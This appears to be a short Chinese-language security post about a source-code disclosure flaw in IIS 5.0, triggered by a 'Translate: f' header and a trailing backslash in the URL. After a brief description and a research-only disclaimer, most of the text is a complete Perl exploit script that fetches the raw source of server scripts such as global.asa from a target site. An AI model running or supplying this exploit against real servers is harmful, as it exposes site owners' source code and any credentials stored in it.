iis5的asp泄露
当 IIS 5.0 接收到一个特殊格式的头 (Translate: f) 的 HTTP 请求,同时 UR
L 末尾包含一个特殊字符时,IIS 会使用错误的处理方法导致文件源代码泄漏。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自
负
#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with sucess against IIS 5.0. Maybe it works against IIS 4.0 u
sing a shared drive but I haven磘 tested it yet.
# Get the source code of any script from the server using this exploit
.
# This code was written after Daniel Docekal brought this issue in Bug
Traq.
# Cheers 351 and FractalG :)
if (not $ARGV[0]) {
print qq~
Geee it磗 running !! kewl :)))
Usage : srcgrab.pl Example Usage : srcgrab.pl http://www.victimsite.co
m/global.asa
U can also save the retrieved file using : srcgrab.pl http://www.victi
m.com/default.asp > file_to_save
~; exit;}
$victimurl=$ARGV[0];
# Create a user agent object
use LWP::UserAgent;
$ua = new LWP::UserAgent;
# Create a request
my $req = new HTTP::Request GET => $victimurl . '\\'; # Here is the ba
ckslash at the end of the url ;)
$req->content_type('application/x-www-form-urlencoded');
$req->content_type('text/html');
$req->header(Translate => 'f'); # Here is the famous translate header
:))
$req->content('match=www&errors=0');
# Pass request to the user agent and get a response back
my $res = $ua->request($req);
# Check the outcome of the response
if ($res->is_success) {
print $res->content;
} else {
print $res->error_as_HTML;
}